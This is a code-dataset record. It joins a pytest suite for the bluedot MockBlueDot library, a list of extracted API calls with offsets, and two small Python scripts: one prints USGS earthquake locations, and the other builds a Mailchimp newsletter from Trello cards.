assert not mbd.print_messages
mbd.print_messages = True
assert mbd.print_messages
assert mbd.double_press_time == 0.3
mbd.double_press_time = 0.4
assert mbd.double_press_time == 0.4
assert mbd.rotation_segments == 8
mbd.rotation_segments = 16
assert mbd.rotation_segments == 16
assert len(mbd.buttons) == 6
def test_start_stop():
mbd = MockBlueDot(auto_start_server = False)
assert not mbd.running
mbd.start()
assert mbd.running
mbd.stop()
assert not mbd.running
def test_connect_disconnect():
mbd = MockBlueDot()
assert not mbd.is_connected
mbd.mock_client_connected()
assert mbd.wait_for_connection(1)
assert mbd.is_connected
mbd.mock_client_disconnected()
assert not mbd.is_connected
def test_when_connect_disconnect():
mbd = MockBlueDot()
event_connect = Event()
mbd.when_client_connects = lambda: event_connect.set()
event_disconnect = Event()
mbd.when_client_disconnects = lambda: event_disconnect.set()
assert not event_connect.is_set()
mbd.mock_client_connected()
assert event_connect.wait(1)
assert not event_disconnect.is_set()
mbd.mock_client_disconnected()
assert event_disconnect.wait(1)
def test_when_connect_disconnect_background():
mbd = MockBlueDot()
event_connect = Event()
mbd.set_when_client_connects(lambda: delay_function(event_connect.set, 0.2), background=True)
event_disconnect = Event()
mbd.set_when_client_disconnects(lambda: delay_function(event_disconnect.set, 0.2), background=True)
mbd.when_client_disconnects = lambda: event_disconnect.set()
assert not event_connect.is_set()
mbd.mock_client_connected()
assert not event_connect.is_set()
assert event_connect.wait(1)
assert not event_disconnect.is_set()
mbd.mock_client_disconnected()
assert not event_disconnect.is_set()
assert event_disconnect.wait(1)
def test_resize():
mbd = MockBlueDot()
mbd.resize(4,3)
assert mbd.cols == 4
assert mbd.rows == 3
assert len(mbd.buttons) == 12
def test_pressed_moved_released():
mbd = MockBlueDot()
mbd.mock_client_connected()
def pressed_moved_released(dot, col, row):
#initial value
assert not mbd.is_pressed
assert dot.value == 0
#pressed
mbd.mock_blue_dot_pressed(col,row,0,0)
assert dot.is_pressed
assert dot.value == 1
#released
mbd.mock_blue_dot_released(col,row,0,0)
assert not dot.is_pressed
assert dot.value == 0
#wait_for_press
delay_function(lambda: mbd.mock_blue_dot_pressed(col,row,0,0), 0.5)
assert dot.wait_for_press(1)
assert not dot.wait_for_release(0)
#wait_for_release
delay_function(lambda: mbd.mock_blue_dot_released(col,row,0,0), 0.5)
assert dot.wait_for_release(1)
assert not dot.wait_for_press(0)
def not_pressed(dot, col, row):
assert not dot.is_pressed
assert not dot.value == 1
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not dot.is_pressed
assert not dot.value == 1
# single button
pressed_moved_released(mbd, 0, 0)
pressed_moved_released(mbd[0,0], 0, 0)
# resize to 2 buttons
mbd.resize(2, 1)
# test second button and main
pressed_moved_released(mbd, 1, 0)
pressed_moved_released(mbd[1,0], 1, 0)
# test second button isn't pressed by first
not_pressed(mbd[1,0], 0, 0)
def test_double_press():
mbd = MockBlueDot()
mbd.mock_client_connected()
def simulate_double_press(col, row):
#sleep longer than the double press time, to clear any past double presses!
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
def simulate_failed_double_press(col, row):
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
sleep(mbd.double_press_time + 0.1)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_released(col,row,0,0)
def double_press(dot, col, row):
# when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
simulate_failed_double_press(col, row)
assert not event_double_pressed.is_set()
simulate_double_press(col, row)
assert event_double_pressed.is_set()
# wait for double press
# double press the blue dot
delay_function(lambda: simulate_double_press(col, row), 0.2)
# wait for double press
assert dot.wait_for_double_press(1)
# dont double press the blue dot
delay_function(lambda: simulate_failed_double_press(col, row), 0.2)
assert not dot.wait_for_double_press(1)
def not_double_press(dot, col, row):
# when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
simulate_double_press(col, row)
assert not event_double_pressed.is_set()
# single button
double_press(mbd, 0, 0)
double_press(mbd[0,0], 0, 0)
mbd.resize(2, 1)
# two buttons
double_press(mbd, 1, 0)
double_press(mbd[1,0], 1, 0)
# first button doesnt double press second button
not_double_press(mbd[1,0], 0, 0)
def test_when_pressed_moved_released():
mbd = MockBlueDot()
mbd.mock_client_connected()
def when_pressed_moved_released(dot, col, row):
#when_pressed
event_pressed = Event()
dot.when_pressed = lambda: event_pressed.set()
#when_double_pressed
event_double_pressed = Event()
dot.when_double_pressed = lambda: event_double_pressed.set()
#when_moved
event_moved = Event()
dot.when_moved = lambda: event_moved.set()
#when_released
event_released = Event()
dot.when_released = lambda: event_released.set()
assert not event_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert event_pressed.is_set()
assert not event_moved.is_set()
mbd.mock_blue_dot_moved(col,row,1,1)
assert event_moved.is_set()
assert not event_released.is_set()
mbd.mock_blue_dot_released(col,row,0,0)
assert event_released.is_set()
assert not event_double_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert event_double_pressed.is_set()
when_pressed_moved_released(mbd, 0, 0)
when_pressed_moved_released(mbd[0,0], 0, 0)
mbd.resize(2,1)
when_pressed_moved_released(mbd, 1, 0)
when_pressed_moved_released(mbd[1,0], 1, 0)
def test_when_pressed_moved_released_background():
mbd = MockBlueDot()
mbd.mock_client_connected()
def when_pressed_moved_released_background(dot, col, row):
#when_pressed
event_pressed = Event()
dot.set_when_pressed(lambda: delay_function(event_pressed.set, 0.2), background=True)
#when_double_pressed
event_double_pressed = Event()
dot.set_when_double_pressed(lambda: delay_function(event_double_pressed.set, 0.2), background=True)
#when_moved
event_moved = Event()
dot.set_when_moved(lambda: delay_function(event_moved.set, 0.2), background=True)
#when_released
event_released = Event()
dot.set_when_released(lambda: delay_function(event_released.set, 0.2), background=True)
# test that the events dont block
assert not event_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not event_pressed.is_set()
assert event_pressed.wait(1)
assert not event_moved.is_set()
mbd.mock_blue_dot_moved(col,row,1,1)
assert not event_moved.is_set()
assert event_moved.wait(1)
assert not event_released.is_set()
mbd.mock_blue_dot_released(col,row,0,0)
assert not event_released.is_set()
assert event_released.wait(1)
# set pressed, moved, released to None so they dont wait
mbd.set_when_pressed(None)
mbd.set_when_moved(None)
mbd.set_when_released(None)
mbd.mock_blue_dot_pressed(col,row,0,0)
mbd.mock_blue_dot_moved(col,row,1,1)
mbd.mock_blue_dot_released(col,row,0,0)
assert not event_double_pressed.is_set()
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not event_double_pressed.is_set()
assert event_double_pressed.wait(1)
when_pressed_moved_released_background(mbd, 0, 0)
when_pressed_moved_released_background(mbd[0,0], 0, 0)
mbd.resize(2,1)
when_pressed_moved_released_background(mbd, 1, 0)
when_pressed_moved_released_background(mbd[1,0], 1, 0)
def test_position():
mbd = MockBlueDot()
mbd.mock_client_connected()
def position(dot, col, row):
mbd.mock_blue_dot_pressed(col,row,0,0)
assert not mbd.position.top
assert mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,1,0)
assert not mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert mbd.position.right
mbd.mock_blue_dot_moved(col,row,-1,0)
assert not mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0,1)
assert mbd.position.top
assert not mbd.position.middle
assert not mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0,-1)
assert not mbd.position.top
assert not mbd.position.middle
assert mbd.position.bottom
assert not mbd.position.left
assert not mbd.position.right
mbd.mock_blue_dot_moved(col,row,0.1234, -0.4567)
assert mbd.position.x == 0.1234
assert mbd.position.y == -0.4567
mbd.mock_blue_dot_moved(col,row,1, 0)
assert mbd.position.distance == 1
assert mbd.position.angle == 90
position(mbd, 0, 0)
position(mbd[0,0], 0, 0)
mbd.resize(2,1)
position(mbd[1,0], 1, 0)
def test_interaction():
mbd = MockBlueDot()
mbd.mock_client_connected()
def interaction(dot, col, row):
assert dot.interaction == None
mbd.mock_blue_dot_pressed(col,row,-1,0)
assert dot.interaction.active
assert len(dot.interaction.positions) == 1
assert dot.interaction.distance == 0
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == -1
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position == None
assert dot.interaction.released_position == None
mbd.mock_blue_dot_moved(col,row,0,0)
assert dot.interaction.active
assert len(dot.interaction.positions) == 2
assert dot.interaction.distance == 1
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == 0
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position.x == -1
assert dot.interaction.previous_position.y == 0
assert dot.interaction.released_position == None
mbd.mock_blue_dot_released(col,row,1,0)
assert not dot.interaction.active
assert len(dot.interaction.positions) == 3
assert dot.interaction.distance == 2
assert dot.interaction.pressed_position.x == -1
assert dot.interaction.pressed_position.y == 0
assert dot.interaction.current_position.x == 1
assert dot.interaction.current_position.y == 0
assert dot.interaction.previous_position.x == 0
assert dot.interaction.previous_position.y == 0
assert dot.interaction.released_position.x == 1
assert dot.interaction.released_position.y == 0
interaction(mbd[0,0], 0, 0)
mbd.resize(2,1)
interaction(mbd[1,0], 1, 0)
def test_swipe():
mbd = MockBlueDot()
mbd.mock_client_connected()
def swipe(dot, col, row):
def simulate_swipe(
col, row,
pressed_x, pressed_y,
moved_x, moved_y,
released_x, released_y):
mbd.mock_blue_dot_pressed(col,row,pressed_x, pressed_y)
mbd.mock_blue_dot_moved(col,row,moved_x, moved_y)
mbd.mock_blue_dot_released(col,row,released_x, released_y)
#wait_for_swipe
delay_function(lambda: simulate_swipe(col,row,-1,0,0,0,1,0), 0.5)
assert dot.wait_for_swipe(1)
#when_swiped
event_swiped = Event()
dot.when_swiped = lambda: event_swiped.set()
assert not event_swiped.is_set()
#simulate swipe left to right
simulate_swipe(col,row,-1,0,0,0,1,0)
#check event
assert event_swiped.is_set()
#get the swipe
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert swipe.right
assert not swipe.left
assert not swipe.up
assert not swipe.down
#right to left
event_swiped.clear()
simulate_swipe(col,row,1,0,0,0,-1,0)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert swipe.left
assert not swipe.up
assert not swipe.down
#bottom to top
event_swiped.clear()
simulate_swipe(col,row,0,-1,0,0,0,1)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert not swipe.left
assert swipe.up
assert not swipe.down
#top to bottom
event_swiped.clear()
simulate_swipe(col,row,0,1,0,0,0,-1)
assert event_swiped.is_set()
swipe = BlueDotSwipe(mbd[col, row].interaction)
assert not swipe.right
assert not swipe.left
assert not swipe.up
assert swipe.down
# background
event_swiped.clear()
dot.set_when_swiped(lambda: delay_function(event_swiped.set, 0.2), background=True)
simulate_swipe(col,row,0,1,0,0,0,-1)
assert not event_swiped.is_set()
assert event_swiped.wait(1)
swipe(mbd, 0, 0)
swipe(mbd[0,0], 0, 0)
mbd.resize(2,1)
swipe(mbd, 1, 0)
swipe(mbd[1,0], 1, 0)
def test_callback_in_class():
class CallbackClass():
def __init__(self):
self.event = Event()
def no_pos(self):
self.event.set()
self.pos = None
def with_pos(self, pos):
self.event.set()
self.pos = pos
cc = CallbackClass()
mbd = MockBlueDot()
mbd.mock_client_connected()
mbd.when_pressed = cc.no_pos
mbd.mock_blue_dot_pressed(0,0,0,0)
assert cc.event.is_set()
assert cc.pos is None
mbd.mock_blue_dot_released(0,0,0,0)
cc.event.clear()
mbd.when_pressed = cc.with_pos
mbd.mock_blue_dot_pressed(0,0,0,0)
assert cc.event.is_set()
assert cc.pos.middle
def test_rotation():
mbd = MockBlueDot()
mbd.mock_client_connected()
def rotation(dot, col, row):
event_rotated = Event()
dot.when_rotated = lambda: event_rotated.set()
assert not event_rotated.is_set()
#press the blue dot, no rotation
mbd.mock_blue_dot_pressed(col,row,-0.1,1)
assert not event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[0,0].rotation_segments)
assert not r.valid
assert r.value == 0
assert not r.clockwise
assert not r.anti_clockwise
#rotate clockwise
event_rotated.clear()
mbd.mock_blue_dot_moved(col,row,0.1,1)
assert event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[col,row].rotation_segments)
assert r.value == 1
assert r.valid
assert r.clockwise
assert not r.anti_clockwise
#rotate anti-clockwise
event_rotated.clear()
mbd.mock_blue_dot_moved(col,row,-0.1,1)
assert event_rotated.is_set()
r = BlueDotRotation(mbd[col,row].interaction, mbd[col,row].rotation_segments)
assert r.value == -1
assert r.valid
assert not r.clockwise
assert r.anti_clockwise
# background
# rotate clockwise again
event_rotated.clear()
dot.set_when_rotated(lambda: delay_function(event_rotated.set, 0.2), background=True)
mbd.mock_blue_dot_moved(col,row,0.1,1)
assert not event_rotated.is_set()
assert event_rotated.wait(1)
rotation(mbd, 0, 0)
rotation(mbd[0,0], 0, 0)
mbd.resize(2,1)
rotation(mbd, 1, 0)
rotation(mbd[1,0], 1, 0)
def test_button_does_not_exist():
mbd = MockBlueDot()
with pytest.raises(ButtonDoesNotExist):
button = mbd[0,1]
def test_allow_pairing():
mbd = MockBlueDot()
assert not mbd.adapter.discoverable
assert not mbd.adapter.pairable
mbd.allow_pairing()
assert mbd.adapter.discoverable
assert mbd.adapter.pairable
def test_dot_appearance():
mbd = MockBlueDot()
assert mbd.color == "blue"
assert mbd.border == False
assert mbd.square == False
assert mbd.visible == True
mbd.resize(2,1)
for button in mbd.buttons:
assert button.color == "blue"
assert button.border == False
assert button.square == False
assert button.visible == True
mbd[1,0].color = "red"
mbd[1,0].border = True
mbd[1,0].square = True
mbd[1,0].visible = False
assert mbd.color == "blue"
assert mbd.border == False
assert mbd.square == False
assert mbd.visible == True
assert mbd[0,0].color == "blue"
assert mbd[0,0].border == False
assert mbd[0,0].square == False
assert mbd[0,0].visible == True
assert mbd[1,0].color == "red"
assert mbd[1,0].border == True
assert mbd[1,0].square == True
assert mbd[1,0].visible == False
mbd.color = "red"
mbd.border = True
mbd.square = True
mbd.visible = False
assert mbd.color == "red"
assert mbd.border == True
assert mbd.square == True
assert mbd.visible == False
assert mbd[0,0].color == "red"
assert mbd[0,0].border == True
assert mbd[0,0].square == True
assert mbd[0,0].visible == False
def test_dot_colors():
from bluedot.colors import BLUE, RED, GREEN, YELLOW
mbd = MockBlueDot()
assert mbd.color == "blue"
assert mbd.color == (0,0,255)
assert mbd.color == BLUE
assert mbd.color == "#0000ff"
assert mbd.color == "#0000ffff"
mbd.color = RED
assert mbd.color == (255,0,0)
assert mbd.color == "red"
assert mbd.color == "#ff0000"
assert mbd.color == "#ff0000ff"
mbd.color = "green"
assert mbd.color == GREEN
assert mbd.color == (0,128,0)
assert mbd.color == "#008000"
assert mbd.color == "#008000ff"
mbd.color = "#ffff00"
assert mbd.color == YELLOW
assert mbd.color == "yellow"
assert mbd.color == (255,255,0)
assert mbd.color == "#ffff00ff"
mbd.color = "#ffffff11"
assert mbd.color == "#ffffff11"
def delay_function(func, time):
delayed_thread = Thread(target = _delayed_function, args = (func, time))
delayed_thread.start()
def _delayed_function(func, time):
sleep(time)
func() | [
"bluedot.BlueDotRotation",
"time.sleep",
"threading.Event",
"bluedot.MockBlueDot",
"bluedot.BlueDotSwipe",
"pytest.raises",
"threading.Thread"
] | [((224, 237), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (235, 237), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((825, 927), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {'device': '"""hci1"""', 'port': '(2)', 'auto_start_server': '(False)', 'print_messages': '(False)', 'cols': '(3)', 'rows': '(2)'}), "(device='hci1', port=2, auto_start_server=False, print_messages=\n False, cols=3, rows=2)\n", (836, 927), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1454, 1490), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {'auto_start_server': '(False)'}), '(auto_start_server=False)\n', (1465, 1490), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1643, 1656), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (1654, 1656), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1901, 1914), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (1912, 1914), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1936, 1943), 'threading.Event', 'Event', ([], {}), '()\n', (1941, 1943), False, 'from threading import Event, Thread\n'), ((2027, 2034), 'threading.Event', 'Event', ([], {}), '()\n', (2032, 2034), False, 'from threading import Event, Thread\n'), ((2375, 2388), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (2386, 2388), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((2410, 2417), 'threading.Event', 'Event', ([], {}), '()\n', (2415, 2417), False, 'from threading import Event, Thread\n'), ((2544, 2551), 'threading.Event', 'Event', ([], {}), '()\n', (2549, 2551), False, 'from threading import Event, Thread\n'), ((3047, 3060), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (3058, 3060), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((3212, 3225), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (3223, 3225), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((4627, 4640), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (4638, 4640), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((6694, 6707), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (6705, 6707), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((8046, 8059), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (8057, 8059), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((10117, 10130), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (10128, 10130), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((11761, 11774), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (11772, 11774), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((13729, 13742), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (13740, 13742), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((16420, 16433), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (16431, 16433), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((16821, 16834), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (16832, 16834), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18542, 18555), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18553, 18555), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18672, 18685), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18683, 18685), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18893, 18906), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18904, 18906), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((20212, 20225), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (20223, 20225), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((20986, 21037), 'threading.Thread', 'Thread', ([], {'target': '_delayed_function', 'args': '(func, time)'}), '(target=_delayed_function, args=(func, time))\n', (20992, 21037), False, 'from threading import Event, Thread\n'), ((21109, 21120), 'time.sleep', 'sleep', (['time'], {}), '(time)\n', (21114, 21120), False, 'from time import sleep\n'), ((4807, 4841), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (4812, 4841), False, 'from time import sleep\n'), ((5089, 5123), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (5094, 5123), False, 'from time import sleep\n'), ((5227, 5261), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (5232, 5261), False, 'from time import sleep\n'), ((5456, 5463), 'threading.Event', 'Event', ([], {}), '()\n', (5461, 5463), False, 'from threading import Event, Thread\n'), ((6200, 6207), 'threading.Event', 'Event', ([], {}), '()\n', (6205, 6207), False, 'from threading import Event, Thread\n'), ((6839, 6846), 'threading.Event', 'Event', ([], {}), '()\n', (6844, 6846), False, 'from threading import Event, Thread\n'), ((6963, 6970), 'threading.Event', 'Event', ([], {}), '()\n', (6968, 6970), False, 'from threading import Event, Thread\n'), ((7083, 7090), 'threading.Event', 'Event', ([], {}), '()\n', (7088, 7090), False, 'from threading import Event, Thread\n'), ((7191, 7198), 'threading.Event', 'Event', ([], {}), '()\n', (7196, 7198), False, 'from threading import Event, Thread\n'), ((8203, 8210), 'threading.Event', 'Event', ([], {}), '()\n', (8208, 8210), False, 'from threading import Event, Thread\n'), ((8366, 8373), 'threading.Event', 'Event', ([], {}), '()\n', (8371, 8373), False, 'from threading import Event, Thread\n'), ((8533, 8540), 'threading.Event', 'Event', ([], {}), '()\n', (8538, 8540), False, 'from threading import Event, Thread\n'), ((8680, 8687), 'threading.Event', 'Event', ([], {}), '()\n', (8685, 8687), False, 'from threading import Event, Thread\n'), ((14351, 14358), 'threading.Event', 'Event', ([], {}), '()\n', (14356, 14358), False, 'from threading import Event, Thread\n'), ((14634, 14673), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (14646, 14673), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((14940, 14979), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (14952, 14979), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((15246, 15285), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (15258, 15285), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((15552, 15591), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (15564, 15591), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((16925, 16932), 'threading.Event', 'Event', ([], {}), '()\n', (16930, 16932), False, 'from threading import Event, Thread\n'), ((17176, 17247), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[0, 0].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[0, 0].rotation_segments)\n', (17191, 17247), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((17522, 17597), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[col, row].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[col, row].rotation_segments)\n', (17537, 17597), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((17870, 17945), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[col, row].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[col, row].rotation_segments)\n', (17885, 17945), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18570, 18603), 'pytest.raises', 'pytest.raises', (['ButtonDoesNotExist'], {}), '(ButtonDoesNotExist)\n', (18583, 18603), False, 'import pytest\n'), ((16202, 16209), 'threading.Event', 'Event', ([], {}), '()\n', (16207, 16209), False, 'from threading import Event, Thread\n')] |
import urllib.request
import urllib.request
import json #necessário para poder controlar arquivos do tipo json
def manipularJson():
endereco="http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
webUrl=urllib.request.urlopen(endereco)
if(webUrl.getcode()==200): #pega as linhas de código da url
dados=webUrl.read() #lendo dados da url
oJSON=json.loads(dados) #carregando ods dados do json
pass
contagem= oJSON["metadata"]["count"]#contagem recebe arquivo JSON metadata tudo relacionado ao count
print("contagem :"+str(contagem))
for local in oJSON["features"]:#vai imprimir todo o array que esta em features
print(local["properties"]["place"]) | [
"json.loads"
] | [((411, 428), 'json.loads', 'json.loads', (['dados'], {}), '(dados)\n', (421, 428), False, 'import json\n')] |
from trello import TrelloClient
from datetime import datetime
from sys import exit, argv
from mailchimp_marketing import Client
from mailchimp_marketing.api_client import ApiClientError
from bs4 import BeautifulSoup
import markdown
from mdx_gfm import GithubFlavoredMarkdownExtension
import config
def debug_out(str):
if config.debug:
print("-- %s" % str)
if len(argv) != 2 or argv[1] not in ["preview", "final"]:
print("Usage: newsletter.py [preview|final]")
exit(1)
newsletter_type = argv[1]
def getTrelloCards():
client = TrelloClient(
api_key=config.api_key,
api_secret=config.api_secret,
token=config.token,
token_secret=config.token_secret
)
org_name = config.org_name
brd_name = config.brd_name
list_name = datetime.now().strftime("%Y-%V")
orgs = list(filter(lambda x: x.name == org_name,
client.list_organizations()))
if len(orgs) != 1:
print("Error while filtering organzation")
exit(1)
debug_out("Organization found")
brds = list(filter(lambda x: x.name == brd_name,
orgs[0].get_boards("open")))
if len(brds) != 1:
print("Error while filtering boards")
exit(1)
debug_out("Board found")
lists = list(filter(lambda x: x.name == list_name,
brds[0].get_lists("open")))
if len(lists) != 1:
print("Error while filtering lists")
exit(1)
cards = lists[0].list_cards()
debug_out("List found, with %s cards" % len(cards))
if len(cards) == 0:
print("Not sending empty newsletter")
exit(1)
return cards
def sendNewsletter(items, newsletter_type):
subject = datetime.now().strftime("MuMaNews - CW %V")
title = "%s %s" % (datetime.now().strftime("%Y-%V"), newsletter_type)
try:
client = Client()
client.set_config({
"api_key": config.mailchimp_api_key,
"server": config.mailchimp_server
})
response = client.campaigns.create({
"type": "regular",
"recipients": {
"list_id": config.mailchimp_list_id
},
"settings": {
"template_id": config.mailchimp_template_id,
"subject_line": subject,
"title": title,
"from_name": config.MAIL_FROM_NAME,
"reply_to": config.MAIL_FROM
}
})
# print(response)
campaign_id = response["id"]
debug_out("Mailchimp Campaign: %s / %s" % (campaign_id, response["web_id"]))
response = client.campaigns.get_content(campaign_id)
soup = BeautifulSoup(response["html"], "html.parser")
template_elem_src = soup.find(
string="%TITLE%").find_parent(class_="mcnTextBlock")
template_txt = str(template_elem_src)
output = []
for item in items:
txt = template_txt.replace("%TITLE%", item.name)
txt = txt.replace("%CONTENT%", markdown.markdown(item.description,extensions=[GithubFlavoredMarkdownExtension()]))
output.append(txt)
new_elem = BeautifulSoup("".join(output), "html.parser")
template_elem_src.replace_with(new_elem)
response = client.campaigns.set_content(campaign_id, {
"html": str(soup)
})
if newsletter_type == "preview":
response = client.campaigns.send_test_email(
campaign_id, {"test_emails": [ config.MAIL_TO_PREVIEW ], "send_type": "html"})
debug_out(str(response))
else:
response = client.campaigns.send(campaign_id)
debug_out(str(response))
except ApiClientError as error:
print("Error: {}".format(error.text))
items = getTrelloCards()
sendNewsletter(items, newsletter_type)
| [
"mailchimp_marketing.Client",
"trello.TrelloClient",
"datetime.datetime.now",
"bs4.BeautifulSoup",
"sys.exit",
"mdx_gfm.GithubFlavoredMarkdownExtension"
] | [((484, 491), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (488, 491), False, 'from sys import exit, argv\n'), ((555, 680), 'trello.TrelloClient', 'TrelloClient', ([], {'api_key': 'config.api_key', 'api_secret': 'config.api_secret', 'token': 'config.token', 'token_secret': 'config.token_secret'}), '(api_key=config.api_key, api_secret=config.api_secret, token=\n config.token, token_secret=config.token_secret)\n', (567, 680), False, 'from trello import TrelloClient\n'), ((1016, 1023), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1020, 1023), False, 'from sys import exit, argv\n'), ((1244, 1251), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1248, 1251), False, 'from sys import exit, argv\n'), ((1468, 1475), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1472, 1475), False, 'from sys import exit, argv\n'), ((1651, 1658), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1655, 1658), False, 'from sys import exit, argv\n'), ((1881, 1889), 'mailchimp_marketing.Client', 'Client', ([], {}), '()\n', (1887, 1889), False, 'from mailchimp_marketing import Client\n'), ((2707, 2753), 'bs4.BeautifulSoup', 'BeautifulSoup', (["response['html']", '"""html.parser"""'], {}), "(response['html'], 'html.parser')\n", (2720, 2753), False, 'from bs4 import BeautifulSoup\n'), ((794, 808), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (806, 808), False, 'from datetime import datetime\n'), ((1737, 1751), 'datetime.datetime.now', 